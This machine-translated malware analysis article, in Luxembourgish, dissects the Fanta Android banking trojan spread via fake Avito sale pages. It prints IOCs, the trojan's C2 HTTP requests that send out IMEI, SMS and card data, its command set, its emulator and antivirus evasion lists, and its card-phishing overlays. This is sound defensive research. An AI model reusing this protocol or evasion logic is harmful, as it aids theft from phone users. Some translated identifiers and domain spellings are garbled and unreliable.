ProHoster > Blog > Internet Neiegkeeten > Leisya, Fanta: nei Taktik vum alen Android Trojaner

Leisya, Fanta: nei Taktik vum alen Android Trojaner

Leisya, Fanta: nei Taktik vum alen Android Trojaner

Enges Daags wëllt Dir eppes op Avito verkafen an, nodeems Dir eng detailléiert Beschreiwung vun Ärem Produkt gepost hutt (zum Beispill e RAM Modul), kritt Dir dëse Message:

Leisya, Fanta: nei Taktik vum alen Android TrojanerWann Dir de Link opmaacht, gesitt Dir eng scheinbar onschëlleg Säit déi Iech, de glécklechen an erfollegräiche Verkeefer, matdeelt datt e Kaf gemaach gouf:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Wann Dir op de "Continue" Knäppchen klickt, gëtt eng APK Datei mat enger Ikon an engem vertrauensinspiréierenden Numm op Ärem Android Apparat erofgelueden. Dir hutt eng Applikatioun installéiert, déi aus irgendege Grënn AccessibilityService Rechter gefrot huet, dunn sinn e puer Fënsteren opgetaucht a si séier verschwonnen an ... Dat ass alles.

Dir gitt Är Gläichgewiicht iwwerpréift, awer aus iergendengem Grond freet Är Bankapplikatioun nach eng Kéier Är Kaartdetailer. Nodeems Dir d'Donnéeën aginn hutt, geschitt eppes schreckleches: aus irgendege Grënn nach onkloer fir Iech, fänken d'Suen aus Ärem Kont ze verschwannen. Dir probéiert de Problem ze léisen, awer Ären Telefon widderstoen: et dréckt d'Taste "Back" an "Home", schalt net aus an erlaabt Iech keng Sécherheetsmoossnamen z'aktivéieren. Als Resultat, sidd Dir ouni Suen lénks, Är Wueren sinn net kaaft ginn, Dir sidd duercherneen a wonneren: wat ass geschitt?

D'Äntwert ass einfach: Dir sidd Affer vum Android Trojan Fanta ginn, e Member vun der Flexnet Famill. Wéi ass dat geschitt? Loosst eis elo erklären.

D'Auteuren: Andrey Polovinkin, Junior Spezialist fir Malware Analyse, Ivan Pisarev, Spezialist fir Malware Analyse.

E puer Statistiken

D'Flexnet Famill vun Android Trojaner gouf fir d'éischt am Joer 2015 bekannt. Iwwer eng zimlech laang Aktivitéitsperiod huet d'Famill op e puer Ënnerarten erweidert: Fanta, Limebot, Lipton, etc. Den Trojaner, wéi och d'Infrastruktur, déi domat verbonnen ass, stinn net roueg: nei efficace Verdeelungsschemae ginn entwéckelt - an eisem Fall héichqualitativ Phishing Säiten, déi op e spezifesche Benotzer-Verkeefer riicht, an d'Trojanesch Entwéckler verfollegen moudesch Trends an Virus Schreiwen - derbäi nei Funktionalitéit datt et méiglech mécht méi effizient Suen aus infizéiert Apparater ze klauen an Contournement Schutz Mechanismen.

D'Campagne, déi an dësem Artikel beschriwwe gëtt, riicht sech u Benotzer aus Russland; eng kleng Unzuel vun infizéierten Apparater goufen an der Ukraine opgeholl, an nach manner a Kasachstan a Wäissrussland.

Och wann Flexnet fir iwwer 4 Joer an der Android Trojaner Arena ass an am Detail vu ville Fuerscher studéiert gouf, ass et nach ëmmer a gudder Form. Vum Januar 2019 un ass de potenzielle Betrag vum Schued méi wéi 35 Milliounen Rubel - an dat ass nëmme fir Kampagnen a Russland. Am Joer 2015 goufen verschidde Versioune vun dësem Android Trojaner op ënnerierdesche Foren verkaaft, wou och de Quellcode vum Trojaner mat enger detailléierter Beschreiwung fonnt gouf. Dëst bedeit datt d'Statistike vum Schued an der Welt nach méi beandrockend sinn. Net e schlechten Indikator fir sou en ale Mann, oder?

Leisya, Fanta: nei Taktik vum alen Android Trojaner

Vum Verkaf bis Täuschung

Wéi aus dem virdru präsentéierte Screenshot vun enger Phishing Säit fir den Internetservice fir Annoncen Avito ze gesinn ass, gouf et fir e spezifescht Affer virbereet. Anscheinend benotzen d'Attacker ee vun den Avito Parser, déi d'Telefonsnummer an den Numm vum Verkeefer extrahéiert, souwéi d'Produktbeschreiwung. Nodeems Dir d'Säit erweidert an d'APK-Datei virbereet, kritt d'Affer eng SMS mat sengem Numm an e Link op eng Phishing-Säit mat enger Beschreiwung vu sengem Produkt an dem Betrag deen aus dem "Verkaaf" vum Produkt kritt gëtt. Andeems Dir op de Knäppchen klickt, kritt de Benotzer eng béiswëlleg APK Datei - Fanta.

Eng Studie vum shcet491[.]ru Domain huet gewisen datt et op Hostinger's DNS Server delegéiert ass:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

D'Domain Zone Datei enthält Entréen déi op d'IP Adressen 31.220.23[.]236, 31.220.23[.]243 an 31.220.23[.]235 weisen. Wéi och ëmmer, de primäre Ressourcerekord vum Domain (A Rekord) weist op e Server mat der IP Adress 178.132.1[.]240.

D'IP Adress 178.132.1[.]240 ass an Holland a gehéiert zum Hoster WorldStream. IP Adressen 31.220.23[.]235, 31.220.23[.]236 an 31.220.23[.]243 sinn am UK a gehéieren zum gemeinsame Hosting Server HOSTINGER. Benotzt als Recorder openprov-ru. Déi folgend Domainen hunn och op d'IP Adress 178.132.1[.]240 geléist:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Et sollt bemierkt datt Linken am folgende Format vu bal all Domain verfügbar waren:

http://(www.){0,1}<%domain%>/[0-9]{7}

Dës Schabloun enthält och e Link vun engem SMS Message. Baséierend op historeschen Donnéeën, gouf festgestallt datt een Domain mat verschiddene Linken am Muster beschriwwen entsprécht, wat beweist datt een Domain benotzt gouf fir den Trojaner op verschidden Affer ze verdeelen.

Loosst eis e bëssen viru sprangen: den Trojaner, deen iwwer e Link vun enger SMS erofgeluede gëtt, benotzt d'Adress onusedseddohap[.]club. Dës Domain gouf registréiert op 2019-03-12, a ab 2019-04-29, APK Uwendungen interagéiert mat dëser Domain. Baséierend op Donnéeën, déi vum VirusTotal kritt goufen, hunn insgesamt 109 Uwendungen mat dësem Server interagéiert. D'Domain selwer ass op d'IP Adress geléist 217.23.14[.]27, läit an Holland a Besëtz vum Host WorldStream. Benotzt als Recorder Numm bëlleg. Domainen sinn och op dës IP Adress geléist bad-racoon[.]club (ab 2018-09-25) an schlecht-racoon[.]liewen (ab 2018-10-25). Mat Domain bad-racoon[.]club méi wéi 80 APK Fichieren interagéiert mat schlecht-racoon[.]liewen - méi wéi 100.

Am Allgemengen, geet den Attack wéi follegt:

Leisya, Fanta: nei Taktik vum alen Android Trojaner

Wat ass ënner dem Fanta sengem Deckel?

Wéi vill aner Android Trojaner, Fanta ass fäeg SMSen ze liesen an ze schécken, USSD Ufroen ze maachen an seng eege Fënsteren uewen op Uwendungen ze weisen (inklusiv Banken). Wéi och ëmmer, d'Arsenal vun der Funktionalitéit vun dëser Famill ass ukomm: Fanta huet ugefaang ze benotzen Accessibilitéit Service fir verschidden Zwecker: d'Inhalter vun Notifikatiounen vun aneren Uwendungen liesen, Erkennung verhënneren an d'Ausféierung vun engem Trojaner op engem infizéierten Apparat stoppen, asw. Fanta funktionnéiert op all Versioune vun Android net méi jonk wéi 4.4. An dësem Artikel wäerte mir déi folgend Fanta Probe méi no kucken:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Direkt nom Start

Direkt nom Start verstoppt den Trojaner seng Ikon. D'Applikatioun kann nëmme funktionnéieren wann den Numm vum infizéierten Apparat net an der Lëscht ass:

  • android_x86
  • VirtualBox
  • Nexus 5X (Bullhead)
  • Nexus 5 (Razor)

Dës Scheck gëtt am Haaptservice vum Trojaner duerchgefouert - MainService. Wann d'éischte Kéier gestart ginn, ginn d'Konfiguratiounsparameter vun der Applikatioun op Standardwäerter initialiséiert (d'Format fir d'Konfiguratiounsdaten ze späicheren an hir Bedeitung gëtt méi spéit diskutéiert), an en neit infizéiert Apparat gëtt um Kontrollserver registréiert. Eng HTTP POST Ufro mam Message Typ gëtt un de Server geschéckt register_bot an Informatioun iwwer den infizéierten Apparat (Android Versioun, IMEI, Telefonsnummer, Numm vum Bedreiwer a Landcode, an deem de Bedreiwer registréiert ass). D'Adress déngt als Kontroll Server hXXp://onuseseddohap[.]club/controller.php. Als Äntwert schéckt de Server e Message mat de Felder bot_id, bot_pwd, Server - d'Applikatioun späichert dës Wäerter als Parameter vum CnC Server. Parameter Server fakultativ wann d'Feld net kritt gouf: Fanta benotzt d'Registrierungsadress - hXXp://onuseseddohap[.]club/controller.php. D'Funktioun fir d'CnC Adress z'änneren kann benotzt ginn fir zwee Probleemer ze léisen: d'Laascht gleichméisseg tëscht verschiddene Serveren ze verdeelen (wann et eng grouss Zuel vun infizéierte Geräter ass, kann d'Laascht op engem onoptimiséierte Webserver héich sinn), an och ze benotzen en alternativen Server am Fall vun engem Ausfall vun engem vun de CnC Serveren.

Wann e Feeler geschitt beim Schécken vun der Ufro, widderhëlt den Trojaner den Aschreiwungsprozess no 20 Sekonnen.

Wann den Apparat erfollegräich registréiert ass, weist Fanta de folgende Message un de Benotzer:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Wichteg Notiz: de Service genannt System Sécherheet - den Numm vum Trojanesche Service, an nodeems Dir op de Knäppchen klickt OK Eng Fënster gëtt op mat den Accessibilitéitsastellunge vum infizéierten Apparat, wou de Benotzer Accessibilitéitsrechter fir de béiswëllegen Service muss ginn:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Soubal de Benotzer op Accessibilitéit Service, Fanta kritt Zougang zum Inhalt vun Applikatiounsfenster an d'Aktiounen, déi an hinnen ausgefouert ginn:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Direkt nodeems d'Accessibilitéitsrechter kritt hunn, freet den Trojaner Administratorrechter a Rechter fir Notifikatiounen ze liesen:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Mat Hëllef vum AccessibilityService simuléiert d'Applikatioun Tastekombinatiounen, wouduerch sech all déi néideg Rechter gëtt.

Fanta erstellt verschidde Datebankinstanzen (déi spéider beschriwwe ginn) noutwendeg fir Konfiguratiounsdaten ze späicheren, souwéi Informatioun gesammelt am Prozess iwwer den infizéierten Apparat. Fir déi gesammelt Informatioun ze schécken, erstellt den Trojaner eng widderhuelend Aufgab entwéckelt fir Felder aus der Datebank erofzelueden an e Kommando vum Kontrollserver ze kréien. Den Intervall fir Zougang zu CnC ass ofhängeg vun der Android Versioun festgeluegt: am Fall vun 5.1 ass den Intervall 10 Sekonnen, soss 60 Sekonnen.

Fir de Kommando ze kréien, mécht Fanta eng Ufro GetTask op de Management Server. Als Äntwert kann CnC ee vun de folgende Kommandoen schécken:

Equipe Beschreiwung
0 Schécken SMS Message
1 Maacht en Uruff oder USSD Kommando
2 Aktualiséiert e Parameter Tëschenzäit
3 Aktualiséiert e Parameter ofgeleet
6 Aktualiséiert e Parameter smsManager
9 Start SMS Messagen sammelen
11 Reset Ären Telefon op d'Fabréckastellungen
12 Aktivéiert / auszeschalten Logged vun Dialogbox Schafung

Fanta sammelt och Notifikatioune vu 70 Banken Apps, schnelle Bezuelsystemer an E-Portemonnaien a späichert se an enger Datebank.

Konfiguratiounsparameter späicheren

Fir Konfiguratiounsparameter ze späicheren, benotzt Fanta eng Standard Approche fir d'Android Plattform - Virléiften- Dateien. D'Astellunge ginn op eng Datei mam Numm gespäichert Astellungen. Eng Beschreiwung vun de gespäicherten Parameteren ass an der Tabell hei ënnen.

Numm Default Wäert Méiglech Wäerter Beschreiwung
id 0 Ganzt Bot ID
Server hXXp://onuseseddohap[.]club/ URL Kontroll Server Adress
pwd - String Server Passwuert
Tëschenzäit 20 Ganzt Zäitintervall. Gëtt un wéi laang déi folgend Aufgaben ausgestallt ginn:

  • Wann Dir eng Ufro iwwer de Status vun enger geschéckter SMS schéckt
  • Kritt en neit Kommando vum Managementserver
ofgeleet all all / Tel Wann d'Feld dem String gläich ass all oder TelNummer, da gëtt de kritt SMS Message vun der Applikatioun ofgefaangen an net dem Benotzer gewisen
smsManager 0 0/1 Aktivéiert / deaktivéiert d'Applikatioun als Standard SMS Empfänger
liesen Dialog falsch Richteg / falsch Aktivéiert / auszeschalten Event Logging AccessibilitéitEvent

Fanta benotzt och d'Datei smsManager:

Numm Default Wäert Méiglech Wäerter Beschreiwung
pckg - String Numm vum SMS Message Manager benotzt

Interaktioun mat Datenbanken

Wärend senger Operatioun benotzt den Trojaner zwou Datenbanken. Datebank genannt a benotzt fir verschidde Informatioune vum Telefon gesammelt ze späicheren. Déi zweet Datebank gëtt genannt fanta.db a gëtt benotzt fir Astellungen ze späicheren, déi verantwortlech sinn fir Phishing-Fënsteren ze kreéieren entworf fir Informatioun iwwer Bankkaarten ze sammelen.

Trojanesche benotzt Datebank а gesammelt Informatioun ze späicheren an Är Handlungen ze protokolléieren. Daten ginn an enger Tabell gespäichert Logbicher. Fir en Dësch ze kreéieren, benotzt déi folgend SQL Ufro:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

D'Datebank enthält déi folgend Informatioun:

1. Logged de Startup vum infizéierte Gerät mat engem Message Den Telefon ageschalt!

2. Notifikatiounen vun Uwendungen. De Message gëtt no der folgender Schabloun generéiert:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Bankkaart Daten aus Phishing Formen erstallt vum Trojanesche. Parameter VIEW_NAME kann ee vun de folgende sinn:

  • AliExpress
  • Avito
  • Google Play
  • Verschiddenes <%App Numm%>

De Message gëtt am Format ageloggt:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Entréeën / erausginn SMS Messagen am Format:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informatioun iwwer de Package deen d'Dialogbox am Format erstellt:

(<%Package name%>)<%Package information%>

Beispill Dësch Logbicher:

Leisya, Fanta: nei Taktik vum alen Android Trojaner
Eng vun de Funktionalitéite vu Fanta ass d'Sammlung vun Informatioun iwwer Bankkaarten. Datesammlung geschitt duerch d'Schafung vu Phishingfenster wann Dir Bankapplikatiounen opmaacht. Den Trojaner erstellt d'Phishingfenster nëmmen eemol. Informatioun datt d'Fënster dem Benotzer gewise gouf gëtt an enger Tabell gespäichert Astellungen an der Datebank fanta.db. Fir eng Datebank ze kreéieren, benotzt déi folgend SQL Ufro:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

All Dësch Felder Astellungen par défaut initialiséiert op 1 (erstellt eng Phishingfenster). Nodeems de Benotzer seng Donnéeën aginn, gëtt de Wäert op 0. Beispill vun Dësch Felder Astellungen:

  • kann_login - d'Feld ass verantwortlech fir de Formulaire ze weisen wann Dir eng Bankapplikatioun opmaacht
  • first_bank - net benotzt
  • kann_avito - d'Feld ass verantwortlech fir de Formulaire ze weisen wann Dir d'Avito Applikatioun opmaacht
  • kann_ali - d'Feld ass verantwortlech fir de Formulaire ze weisen wann Dir d'Aliexpress Applikatioun opmaacht
  • kann_aner - d'Feld ass verantwortlech fir de Formulaire ze weisen wann Dir eng Applikatioun aus der Lëscht opmaacht: Yula, Pandao, Drom Auto, Portemonnaie. Remise a Bonus Kaarte, Aviasales, Booking, Trivago
  • kann_card - d'Feld ass verantwortlech fir de Formulaire beim Ouverture ze weisen Google Play

Interaktioun mam Management Server

Netzwierkinteraktioun mam Managementserver geschitt iwwer den HTTP-Protokoll. Fir mam Netz ze schaffen, benotzt Fanta déi populär Retrofit-Bibliothéik. Ufroe ginn un: hXXp://onuseseddohap[.]club/controller.php. D'Serveradress kann geännert ginn wann Dir um Server registréiert. Cookies kënnen als Äntwert vum Server geschéckt ginn. Fanta mécht déi folgend Ufroen un de Server:

  • Aschreiwung vum Bot op de Kontrollserver geschitt eemol, beim éischte Start. Déi folgend Donnéeën iwwer den infizéierten Apparat ginn op de Server geschéckt:
    · Cookie - Cookien vum Server kritt (Standardwäert ass eng eidel String)
    · Modus - String konstant register_bot
    · Präfix - ganz Zuel konstant 2
    · version_sdk - ass geformt no der folgender Schabloun: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · Iimei - IMEI vum infizéierten Apparat
    · Land - Code vum Land an deem de Bedreiwer registréiert ass, am ISO Format
    · Zuel - Telefonsnummer
    · Bedreiwer - Bedreiwer Numm

    E Beispill vun enger Ufro un de Server geschéckt:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Als Äntwert op d'Ufro muss de Server en JSON-Objet zréckginn deen déi folgend Parameteren enthält:
    · bot_id - ID vum infizéierte Gerät. Wann bot_id gläich ass 0, wäert Fanta d'Ufro nei ausféieren.
    bot_pwd - Passwuert fir de Server.
    Server - Kontroll Server Adress. Optional Parameter. Wann de Parameter net uginn ass, gëtt d'Adress, déi an der Applikatioun gespäichert ass, benotzt.

    Beispill JSON Objet:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Ufro fir e Kommando vum Server ze kréien. Déi folgend Donnéeë ginn op de Server geschéckt:
    · Cookie - Cookien vum Server kritt
    · Offer - ID vum infizéierte Gerät, dee kritt gouf beim Schécken vun der Ufro register_bot
    · pwd - Passwuert fir de Server
    · deel_admin - d'Feld bestëmmt ob Administrator Rechter kritt goufen. Wann Administrator Rechter kritt goufen, ass d'Feld gläich 1anescht 0
    · Accessibilitéit - Accessibilitéit Service Operatioun Status. Wann de Service gestart gouf, ass de Wäert 1anescht 0
    · SMS Manager - weist ob den Trojaner als Standardapplikatioun aktivéiert ass fir SMS ze kréien
    · Écran - weist an wéi engem Zoustand den Écran ass. De Wäert gëtt gesat 1, wann den Ecran op ass, soss 0;

    E Beispill vun enger Ufro un de Server geschéckt:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Ofhängeg vum Kommando kann de Server e JSON-Objet mat verschiddene Parameteren zréckginn:

    · Equipe Schécken SMS Message: D'Parameteren enthalen d'Telefonsnummer, den Text vun der SMS an d'ID vun der geschéckter Noriicht. Den Identifizéierer gëtt benotzt wann Dir e Message un de Server mat Typ schéckt setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · Equipe Maacht en Uruff oder USSD Kommando: D'Telefonsnummer oder Kommando kënnt am Äntwert Kierper. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · Equipe Intervallparameter änneren. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · Equipe Änneren Interceptparameter. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · Equipe Änneren SmsManager Feld. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · Equipe Sammelt SMS Messagen vun engem infizéierten Apparat.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · Equipe Reset Ären Telefon op d'Fabréckastellungen: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · Equipe Änneren ReadDialog Parameter. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Schéckt e Message mat Typ setSmsStatus. Dës Ufro gëtt gemaach nodeems de Kommando ausgefouert gëtt Schécken SMS Message. D'Ufro gesäit esou aus:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Eroplueden Datebank Inhalt. Eng Zeil gëtt pro Ufro iwwerdroen. Déi folgend Donnéeë ginn op de Server geschéckt:
    · Cookie - Cookien vum Server kritt
    · Modus - String konstant setSaveInboxSms
    · Offer - ID vum infizéierte Gerät, dee kritt gouf beim Schécken vun der Ufro register_bot
    · Text - Text am aktuellen Datebankrekord (Feld d vum Dësch Logbicher an der Datebank а)
    · Zuel - Numm vum aktuellen Datebankrekord (Feld p vum Dësch Logbicher an der Datebank а)
    · sms_mode - ganzt Wäert (Feld m vum Dësch Logbicher an der Datebank а)

    D'Ufro gesäit esou aus:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Wann erfollegräich op de Server geschéckt, gëtt d'Zeil aus dem Dësch geläscht. Beispill vun engem JSON-Objet deen vum Server zréckkoum:

    {
    "response":[],
    "status":"ok"
}

Interaktioun mat AccessibilityService

AccessibilityService gouf implementéiert fir Android Apparater méi einfach ze benotzen fir Leit mat Behënnerungen. An de meeschte Fäll ass kierperlech Interaktioun erfuerderlech fir mat enger Applikatioun ze interagéieren. AccessibilityService erlaabt Iech se programmatesch ze maachen. Fanta benotzt de Service fir gefälschte Fënsteren a Bankapplikatiounen ze kreéieren an ze verhënneren datt d'Benotzer Systemastellungen an e puer Uwendungen opmaachen.

Mat der Funktionalitéit vum AccessibilityService iwwerwaacht den Trojaner Ännerungen un Elementer um Bildschierm vum infizéierte Gerät. Wéi virdru beschriwwen, enthalen d'Fanta Astellunge e Parameter verantwortlech fir Logbicher Operatiounen mat Dialogboxen - liesen Dialog. Wann dëse Parameter agestallt ass, ginn Informatioun iwwer den Numm an d'Beschreiwung vum Package, deen d'Evenement ausgeléist huet, an d'Datebank bäigefüügt. Den Trojaner mécht déi folgend Aktiounen wann Eventer ausgeléist ginn:

  • Simuléiert d'Press vun de Réck- an Heem Schlësselen an de folgende Fäll:
    · wann de Benotzer säin Apparat nei starten wëllt
    · wann de Benotzer d'App "Avito" läschen wëllt oder d'Zougangsrechter änneren
    · wann et eng Ernimmung vun der "Avito" Applikatioun op der Säit ass
    · wann Dir d'Google Play Protect Applikatioun opmaacht
    · wann Dir Säiten mat AccessibilityService Astellungen opmaacht
    · wann de System Sécherheet Dialog Këscht schéngt
    · wann Dir d'Säit mat den Astellunge "Zeechnen iwwer aner App" opmaacht
    · Wann Dir d'Säit "Uwendungen" opmaacht, "Erhuelung an zrécksetzen", "Daten zrécksetzen", "Astellungen zrécksetzen", "Entwécklerpanel", "Special. Opportunitéiten, Besonnesch Méiglechkeeten, Besonnesch Rechter
    · wann d'Evenement duerch bestëmmte Applikatiounen generéiert gouf.

    Lëscht vun Uwendungen

    • android
    • Master Lite
    • Propper Meeschter
    • Clean Master fir x86 CPU
    • Meizu Applikatioun Permission Management
    • MIUI Sécherheet
    • Clean Master - Antivirus & Cache a Gerempels Cleaner
    • Elteren Kontrollen a GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Sécherheet PRO
    • Avast Antivirus & Gratis Schutz 2019
    • Mobile Sécherheet MegaFon
    • AVG Schutz fir Xperia
    • Mobile Sécherheet
    • Malwarebytes Antivirus & Schutz
    • Antivirus fir Android 2019
    • Sécherheet Master - Antivirus, VPN, AppLock, Booster
    • AVG Antivirus fir Huawei Tablet System Manager
    • Samsung Accessibilitéit
    • Samsung Smart Manager
    • Sécherheet Master
    • Speed ​​Booster
    • Dr. Web
    • Dr.Web Sécherheetsraum
    • Dr.Web Mobile Kontrolléiere Center
    • Dr.Web Sécherheet Space Life
    • Dr.Web Mobile Kontrolléiere Center
    • Antivirus & Mobil Sécherheet
    • Kaspersky Internet Security: Antivirus a Schutz
    • Kaspersky Battery Life: Saver & Booster
    • Kaspersky Endpoint Security - Schutz a Gestioun
    • AVG Antivirus gratis 2019 - Schutz fir Android
    • Antivirus Android
    • Norton Mobile Sécherheet an Antivirus
    • Antivirus, Firewall, VPN, mobil Sécherheet
    • Mobile Sécherheet: Antivirus, VPN, Déifstallschutz
    • Antivirus fir Android

  • Wann d'Erlaabnis gefrot gëtt wann Dir en SMS op eng kuerz Nummer schéckt, simuléiert Fanta Klick op d'Checkbox Erënneren d'Wiel an de Knäppchen schécken.
  • Wann Dir probéiert Administratorrechter vum Trojaner ewechzehuelen, gespaart den Telefonbildschierm.
  • Verhënnert nei Administrateuren dobäizemaachen.
  • Wann d'Antivirus Applikatioun dr.web entdeckt eng Bedrohung, Fanta imitéiert de Knäppchen dréckt ignoréieren.
  • Den Trojaner simuléiert de Réck- an Heemknäppchen drécken wann d'Evenement vun der Applikatioun generéiert gouf Samsung Device Care.
  • Fanta erstellt Phishingfenster mat Formulaire fir Informatioun iwwer Bankkaarten anzeginn wann eng Applikatioun aus enger Lëscht vun ongeféier 30 verschiddenen Internetservicer gestart gouf. Ënnert hinnen: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.

    Phishing Formen

    Fanta analyséiert wéi eng Uwendungen um infizéierten Apparat lafen. Wann eng Applikatioun vun Interesse opgemaach gouf, weist den Trojanesche eng Phishing-Fënster uewen op all aner, dat ass e Formulaire fir d'Bankkaartinformatioun anzeginn. De Benotzer muss déi folgend Donnéeën aginn:

    • Kaart Nummer
    • Verfallsdatum vun der Kaart
    • CVV
    • Cardholder Numm (net fir all Banken)

    Ofhängeg vun der lafender Applikatioun, gi verschidde Phishing-Fënstere gewisen. Drënner sinn Beispiller vun e puer vun hinnen:

    AliExpress:

    Leisya, Fanta: nei Taktik vum alen Android Trojaner
    Avito:

    Leisya, Fanta: nei Taktik vum alen Android Trojaner
    Fir e puer aner Uwendungen, z.B. Google Play Maart, Aviasales, Pandao, Booking, Trivago:
    Leisya, Fanta: nei Taktik vum alen Android Trojaner

    Wéi et wierklech war

    Glécklecherweis huet sech d'Persoun, déi d'SMS-Message, déi am Ufank vum Artikel beschriwwe gouf, kritt als Cybersecurity-Spezialist. Dofir ënnerscheet déi richteg, net-Direkter Versioun vun der virdrun gesot: eng Persoun krut eng interessant SMS, duerno huet hien et dem Group-IB Threat Hunting Intelligence Team ginn. D'Resultat vun der Attack ass dësen Artikel. Happy End, richteg? Wéi och ëmmer, net all Geschichte sinn esou erfollegräich ofgeschloss, a fir datt Är net wéi e Regisseurschnëtt mat engem Geldverloscht ausgesäit, ass et an de meeschte Fäll genuch fir déi folgend laang beschriwwe Regelen ze halen:

    • installéieren keng Applikatiounen fir e mobilen Apparat mat Android OS vun anere Quellen wéi Google Play
    • Wann Dir eng Applikatioun installéiert, gitt besonnesch Opmierksamkeet op d'Rechter, déi vun der Applikatioun gefrot ginn
    • oppassen op d'Extensiounen vun den erofgeluede Dateien
    • installéiert Android OS Updates regelméisseg
    • besicht net verdächteg Ressourcen a luet keng Dateien vun do erof
    • Klickt net op Linken, déi an SMS Messagen kritt goufen.

Source: will.com

Setzt e Commentaire